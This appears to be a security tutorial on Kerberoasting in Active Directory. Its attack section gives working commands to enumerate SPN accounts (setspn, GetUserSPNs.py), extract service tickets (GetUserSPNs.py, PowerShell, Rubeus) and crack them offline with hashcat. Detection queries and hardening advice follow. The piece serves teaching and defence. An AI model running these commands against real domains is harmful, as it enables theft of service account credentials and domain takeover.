Kerberoasting remains the highest-ROI Active Directory attack: any authenticated domain user can request a service ticket for any account with a Service Principal Name (SPN), and crack that ticket offline. No special privileges. No exploits. Just Kerberos working as designed.
The Protocol Detail That Makes It Work
When a user requests a service ticket (TGS), the KDC encrypts a portion of the ticket with the service account’s password hash. Anyone authenticated can request a TGS for any SPN. So:
- Enumerate accounts with SPNs.
- Request TGS tickets for them.
- Extract the encrypted blob.
- Crack the password offline.
The only protection against step 4 is a strong password — and service account passwords are notoriously weak.
Enumeration
From a domain-joined Windows host:
PS> setspn -T contoso.local -Q */*
CN=svc_sql,OU=Service Accounts,DC=contoso,DC=local
MSSQLSvc/sql01.contoso.local:1433
CN=svc_iis,OU=Service Accounts,DC=contoso,DC=local
HTTP/web01.contoso.local
From Linux with credentials:
$ GetUserSPNs.py contoso.local/user:'Password1' -dc-ip 10.0.0.10
ServicePrincipalName Name MemberOf
MSSQLSvc/sql01:1433 svc_sql CN=Domain Admins,...
That Domain Admins membership is the prize. Many real environments have at least one SPN-bearing account that ended up over-privileged through legacy delegation.
Extracting the Ticket
GetUserSPNs.py contoso.local/user:'Password1' -dc-ip 10.0.0.10 -request \
-outputfile spn_hashes.txt
Or from a Windows session:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken `
-ArgumentList "MSSQLSvc/sql01.contoso.local:1433"
# Then dump with Rubeus or mimikatz
Rubeus.exe kerberoast /outfile:hashes.txt
Cracking
hashcat -m 13100 spn_hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule
-m 13100 is the Kerberos 5 TGS-REP etype 23 mode (RC4-HMAC). If the domain enforces AES-only (etype 17/18), use mode 19700/19600 — substantially slower but still tractable for weak passwords.
Detection
The single most important signal is Event ID 4769 on Domain Controllers:
Account Name: [email protected]
Service Name: svc_sql
Ticket Encryption Type: 0x17 <-- RC4-HMAC, suspicious
Hunt query (Splunk-style):
index=windows EventCode=4769 Ticket_Encryption_Type=0x17
| stats count by Account_Name, Service_Name
| where count > 5
Modern attackers know this and request only one ticket per service. Effective detection combines:
- RC4 ticket requests to AES-capable services (anomaly)
- Single user requesting many distinct SPNs within a short window
- Honeytoken SPN — an unused account with an SPN; any TGS request for it is automatically suspicious
Hardening
- Use Group Managed Service Accounts (gMSA) — passwords are auto-rotated, 240 bytes, and never readable by humans. Kerberoastable hashes from a gMSA are functionally uncrackable.
- Enforce AES-only encryption on service accounts. Set
msDS-SupportedEncryptionTypes = 0x18. - Long, random passwords (>25 chars) on legacy service accounts that cannot move to gMSA.
- Audit SPN coverage quarterly — orphaned SPNs accumulate over years.